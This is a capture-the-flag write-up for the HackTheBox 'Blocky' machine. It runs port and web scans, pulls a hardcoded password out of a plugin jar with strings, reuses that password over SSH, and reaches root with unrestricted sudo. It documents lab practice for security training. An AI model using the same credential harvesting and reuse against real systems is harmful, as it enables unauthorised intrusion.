Welcome to the Blocky writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Blocky

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:38 CEST
Nmap scan report for 10.10.10.37
Host is up (0.10s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft

Nmap done: 1 IP address (1 host up) scanned in 156.69 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 21,22,80,8192,25565 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:42 CEST
Nmap scan report for 10.10.10.37
Host is up (0.10s latency).

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|WAP|specialized|storage-misc|broadband router|printer
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (89%), HP embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8192/tcp)
HOP RTT       ADDRESS
1   101.83 ms 10.10.14.1
2   102.62 ms 10.10.10.37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.84 seconds

Port 80

Gobuster

$ gobuster dir -w /usr/share/wordlists/custom.txt -u http://10.10.10.37/ -x php -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.37/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/custom.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/05/10 19:47:27 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess.php        (Status: 403) [Size: 299]
/.htaccess            (Status: 403) [Size: 295]
/.hta.php             (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 295]
/.htaccess.php        (Status: 403) [Size: 299]
/.htpasswd            (Status: 403) [Size: 295]
/.htpasswd.php        (Status: 403) [Size: 299]
/.htpasswd.php        (Status: 403) [Size: 299]
/.htpasswd            (Status: 403) [Size: 295]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/plugins              (Status: 301) [Size: 312] [--> http://10.10.10.37/plugins/]   
/server-status        (Status: 403) [Size: 299]                                     
/server-status        (Status: 403) [Size: 299]                                     
/wiki                 (Status: 301) [Size: 309] [--> http://10.10.10.37/wiki/]      
/wp-admin             (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]  
/wp-admin             (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]  
/wp-content           (Status: 301) [Size: 315] [--> http://10.10.10.37/wp-content/]
/wp-blog-header.php   (Status: 200) [Size: 0]                                       
/wp-cron.php          (Status: 200) [Size: 0]                                       
/wp-config.php        (Status: 200) [Size: 0]                                       
/wp-config.php        (Status: 200) [Size: 0]                                       
/wp-includes          (Status: 301) [Size: 316] [--> http://10.10.10.37/wp-includes/]
/wp-load.php          (Status: 200) [Size: 0]                                        
/wp-mail.php          (Status: 403) [Size: 3444]                                     
/wp-links-opml.php    (Status: 200) [Size: 219]                                      
/wp-login.php         (Status: 200) [Size: 2402]                                     
/wp-login.php         (Status: 200) [Size: 2402]                                     
/wp-settings.php      (Status: 500) [Size: 0]                                        
/wp-signup.php        (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register]
/wp-trackback.php     (Status: 200) [Size: 135]                                                    
/wp-trackback.php     (Status: 200) [Size: 135]                                                    
/xmlrpc.php           (Status: 405) [Size: 42]                                                     
/xmlrpc.php           (Status: 405) [Size: 42]                                                     
/xmlrpc.php           (Status: 405) [Size: 42]                                                     

===============================================================
2021/05/10 20:05:39 Finished
===============================================================

Wpscan

$ wpscan --url http://10.10.10.37/ -e --plugins-detection aggressive
[...]
[i] No plugins Found.
[...]
[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[...]

Well, inside the directory plugins. We can find two files BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar. Let's download them and analyze them.

$ jar xf BlockyCore.jar
$ strings com/myfirstplugin/BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
    localhost   
root    
8YsqfCTnvxAUeduzjNSXe22 
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java

Mmmm interesat string... 8YsqfCTnvxAUeduzjNSXe22.

We have a user and this string ...Let me try...

SSH

First I tested with root because in blockycore.class they also mention the root user but it has not worked so we are going to use notch

$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
[email protected]:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[email protected]:~$ cat user.txt 
CENSORED_FLAG
[email protected]:~$

And we are in!!

Post exploitation

Enumeration

Sudo

[email protected]:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Really? ok...

Privilege escalation

[email protected]:~$ sudo su
[email protected]:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/notch# cd /root
[email protected]:~# ls
root.txt
[email protected]:~# cat root.txt 
CENSORED_FLAG
[email protected]:~#

Easy peasy 🤷‍♂️